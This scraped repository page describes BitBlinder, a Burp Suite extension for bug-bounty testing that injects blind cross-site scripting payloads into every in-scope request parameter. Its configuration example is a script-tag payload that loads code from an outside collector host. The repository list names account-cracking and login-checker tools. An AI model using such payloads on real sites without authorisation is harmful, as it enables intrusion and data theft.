• Stars
    star
    101
  • Rank 328,027 (Top 7 %)
  • Language
    Python
  • Created over 5 years ago
  • Updated 12 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities

BitBlinder

THIS TOOLS IS IN EARLY BETA USE IT ON YOUR OWN RISK
Burp extension helps in finding blind xss vulnerabilities by injecting xss payloads in every request passes throw BurpSuite

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
-  Developer: Ahmed Ezzat (BitTheByte)      -
-  Github:    https://github.com/BitTheByte -
-  Version:   0.05b                         -
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE
[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY
[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH

Configuration

Go to Bit blinder tab then enable it
Set your payloads (line separated)

"><script%20src="https://myusername.xss.ht"><script>
"><script%20src="https://myusername.xss.ht"><script>
...

If you added more than 1 payload enable the randomization button
If you want to keep it disabled keep in mind that the tool will use the first payload only

How to use

  1. Load the extension to your burpsuite
  2. Click on Bit blinder tab then enable it
  3. Add your target to scope It'll only work for inscope items
  4. Continue your hunting session Make sure to do alot of actions [Forms,Search,...]
  5. Monitor the output in extension's output tab

Note: By the nature of this tool it'll make alot of requests so you may get blocked by WAF or experience slow internet connection

In a nutshell

When user visits https://example.com?vuln=123&vuln2=abc
This tool will generate the following 2 requests (in the background without effecting the current session)

  1. https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc
  2. https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD]

The previous example also applies to POST parameters

Current version

Version 0.05b

TO-DO (By priority)

  • GUI βœ“ ( A very ugly one for now.. )
  • Fix endless request loops βœ“
  • Injection in headers
  • Option to exclude paramters/hosts/endpoints
  • Better output/logging system

More Repositories

1

YouTubeShop

Youtube autolike and autosubs script
Python
302
star
2

Monitorizer

Multithreaded monitoring framework to detect and report newly found subdomains on a specific target using various scanning tools with support for Acunetix & Nuclei
Python
242
star
3

Eagle

Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
Python
103
star
4

Domainker

BugBounty Tool
Python
40
star
5

BitMapper

Burp-suite Extension For finding .map files
Python
36
star
6

GmailChecker

Youtube or Gmail login checker
Python
29
star
7

BitTraversal

Burpsuite Plugin to detect Directory Traversal vulnerabilities
Java
26
star
8

Orkestra

Web-based Android debugger with inspection capabilities using Frida and Jadx as a backbone
Python
25
star
9

WayRobots

Tool to find stored robots.txt files from the past
Python
16
star
10

Watcherizer

Slack Bot for monitoring websites for codebase changes
Python
15
star
11

Awesome-collisions

Collection of vulnerable functions
11
star
12

XML-Finder

[XXE TOOL] Burp suite extension to detect requests contains XML
Python
10
star
13

FacebookCracker

python cracker for facebook accounts
Python
8
star
14

ModernCryptoLib

Python cryptography library
Python
7
star
15

Facebook-Toolkit

Facebook Python API
Python
6
star
16

CTF-Writeup

Python
6
star
17

Needle

Wrapper around python threading/concurrent module allowing fast development of threaded python applications
Python
5
star
18

BitDefined

Chrome based extension to list custom defined javascript types
JavaScript
5
star
19

Pybook

Facebook messages reply framework
Python
4
star
20

LetsFoolBots

Python
4
star
21

YoutubeAPI

Youtube api for bots
PHP
3
star
22

Web-Spider

Python Web Spider
Python
3
star
23

Image-Reader

Python OCR program to read text within images
3
star
24

sms-beta-website

JavaScript
2
star
25

Helpers

Python
2
star
26

PyVM

Custom Python based VM
Python
1
star
27

PySafe

Python code protector
Python
1
star
28

bitthebyte.github.io

CSS
1
star
29

Jsepy

Little python GUI framework
Python
1
star
30

Awesome-SubSystem

Shell
1
star